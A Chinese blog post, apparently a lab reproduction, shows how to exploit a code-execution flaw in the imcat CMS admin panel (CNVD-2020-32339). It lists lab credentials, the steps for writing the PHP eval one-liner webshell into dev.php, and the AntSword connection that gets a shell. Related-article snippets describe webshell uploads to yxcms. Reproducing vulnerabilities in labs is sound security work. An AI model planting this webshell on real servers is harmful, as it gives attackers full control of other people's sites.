imcat远程代码执行(CNVD-2020-32339)

最新推荐文章于 2024-08-26 22:53:01 发布
最新推荐文章于 2024-08-26 22:53:01 发布
阅读量332 收藏 1
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135956560
版权

漏洞描述:

  贴心猫(imcat)是一款PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、共享,永久开源免费。imcat后台存在代码执行漏洞。攻击者可利用此漏洞执行任意代码。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.访问http://ip:port/root/run/adm.php ,进入后台登录页面,并输入账号密码进行登录

账号:adm_vulfocus

密码:pass_vulfocus

3.在工具中找到DIY配置-搜索,选择入口配置,修改dev.php内容为php一句话木马

<?php @eval($_POST['cmd']); ?>

4.保存后,通过蚁剑连接,getshell

借此漏洞攻击者获取到网站的shell权限,控制整个网站,可以进行文件读取和命令执行。

修复建议:

1.关闭后台修改源码功能

慕筱蚺
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
imcat 远程代码执行CNVD-2020-32339
qq_32445755的博客
07-05 417
贴心猫(imcat)是一款PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、共享,永久开源免费。 imcat后台存在代码执行漏洞。攻击者可利用漏洞执行任意代码。 后台路径:root/run/adm.phpCMS后台提供在线源代码编辑功能,然后通过imcat-5.4、imcat、core、glib和safscan.php文件过滤危险函数。但是由于过滤功能的过滤规则不完整,可以编写和执行危险代码,形成代码执行漏洞,攻击者可以通过该漏洞获得服务器的权限 后台:目标\/root/run/adm.php
贴心猫(ImCat) v4.8
09-30
贴心猫(ImCat) 是以PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、、共享。适用于:网店,医院,学校,企业站,个人网站,企业内部Intranet,中小型行业门户站点等……功能
2021-09-01
m0_51170293的博客
09-01 132
yxcms 红日靶场 /phpadmin root root 御剑扫 查看beifen 解压 发现这个文件 访问 /yxcms 根据提示 进来了 写马 再用蚁剑连马 找地方传马 前台模板-》管理首页-》index_index.php 不一定非是这个 只要是php后缀 能写东西 而且是在源码里有的文件 不是别人写的 yxcms文件里能找到的 ,用everything可以搜到的 写一句话木马 everthing搜该文件的路径 为连蚁剑做准备 据此找到路径 http://192.168.3
php mysql 架构设计_贴心猫(ImCat) PHP+MySQL架构设计的通用网站系统
weixin_39663593的博客
02-03 164
贴心猫(ImCat) 是以PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、免费、共享。适用于:网店,医院,学校,企业站,个人网站,企业内部Intranet,中小型行业门户站点等……功能介绍:1、支持:PHP5.4~PHP7.3/自定义模块/自定义字段/自定义参数/自定义分类/模板继承/tag缓存/js标签/静态2、模型:问答系统/内部公文/商品展销/新闻/专题/课程资源/样例文档/用户...
seacms 远程命令执行CNVD-2020-22721)
yzl_007的博客
08-25 1382
seacms 远程命令执行CNVD-2020-22721) 漏洞描述 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 漏洞复现 漏洞位置在系统的图片水印设置里面 选取一张图片,然后上传burp拦截,修改参数 放包,然后重新打开水印设置 代码审计 后续再整理 ...
贴心猫(ImCat)源代码
03-18
贴心猫(ImCat) 是以PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、免费、共享。 适用于:网店,医院,学校,企业站,个人网站,企业内部Intranet,中小型行业门户站点等…… 功能介绍: 1、支持:PHP5.4~...
cpp-imcat在终端窗口中预览任意大小的图像
08-16
要使用cpp-imcat,首先需要从`imcat-master`压缩包中解压并编译源代码。通常,这包括以下步骤: 1. **解压**:将`imcat-master`解压到本地目录。 2. **编译**:进入解压后的目录,使用`g++`或类似的C++编译器编译源...
贴心猫(ImCat) v5.0
09-29
**贴心猫(ImCat) v5.0:通用网站系统的深度解析** 贴心猫(ImCat) v5.0是一款基于PHP+MySQL技术架构的全能型网站管理系统,它以其简约、轻量级和实用性的特点,成为了众多企业和个人建站的首选。这款系统不仅能够...
如何使用双重IP代理实现更安全的网络访问
IPIPGO的博客
08-26 369
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
网络安全教程初级简介
网络研究观
08-26 396
网络安全包括一系列技术、流程和实践,用于保护网络、设备、应用程序和数据免受攻击、盗窃或损坏等威胁。
【宝马中国-注册/登录安全分析报告】
08-26 900
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
基于视觉识别引擎+深度学习实现安全保障数字化的智慧城管开源了
weixin_63598920的博客
08-26 355
智慧城管视觉监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。
等保测评中的安全测试方法
w13359990065的博客
08-26 466
通过物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评等多层次的综合评估,可以有效识别系统中的安全隐患,提升信息系统的整体安全防护能力,满足国家相关法律法规的要求,助力企业提升行业竞争力。在等保测评中,安全测试方法的有效实施离不开专业的测评团队和科学的测评流程。测评团队需具备丰富的安全测试经验和专业知识,能够准确识别系统中的安全风险并提出切实可行的整改建议。首先,等保测评中的安全测试方法涵盖了多个层面,包括但不限于物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评。
92.WEB渗透测试-信息收集-Google语法(6)
计算机王的博客
08-22 416
web渗透测试
物联网安全框架:构建安全互联的未来世界
A526847的博客
08-26 290
物联网安全框架的构建是一个复杂而系统的工程,需要设备制造商、软件开发商、服务提供商和用户等多方共同努力。通过加强数据加密、身份认证、人工智能和区块链等技术的应用,推动统一安全标准的制定和实施,我们可以构建一个安全、可靠、互联的未来世界。在这个过程中,每一个参与者的努力都至关重要,让我们携手共进,为物联网的健康发展贡献自己的力量。
深入探讨Linux中的EncFS:安全、灵活的加密文件系统
prop428的博客
08-26 523
深入探讨Linux中的EncFS:安全、灵活的加密文件系统
注册安全分析报告:助通信息
最新发布
Explinks的博客
08-26 639
上海助通信息科技在近10年的历程中,以专业的服务团队、国际化、高标准的工作流程为超过10万余家企事业单位提供提供国内领先的网络接入服务和互联网行业增值服务,技术实力雄厚,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。
[ICS] 物理安全
08-26 695
#工业控制系统气泡模型理论 #端口锁定 #物理端口安全 #设施监控 #爆炸物检测计划 #USB 端口阻塞
网络安全-安全渗透简介和安全渗透环境准备
weixin_57370131的博客
08-26 595
安全渗透简介和安全渗透测试环境准备。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值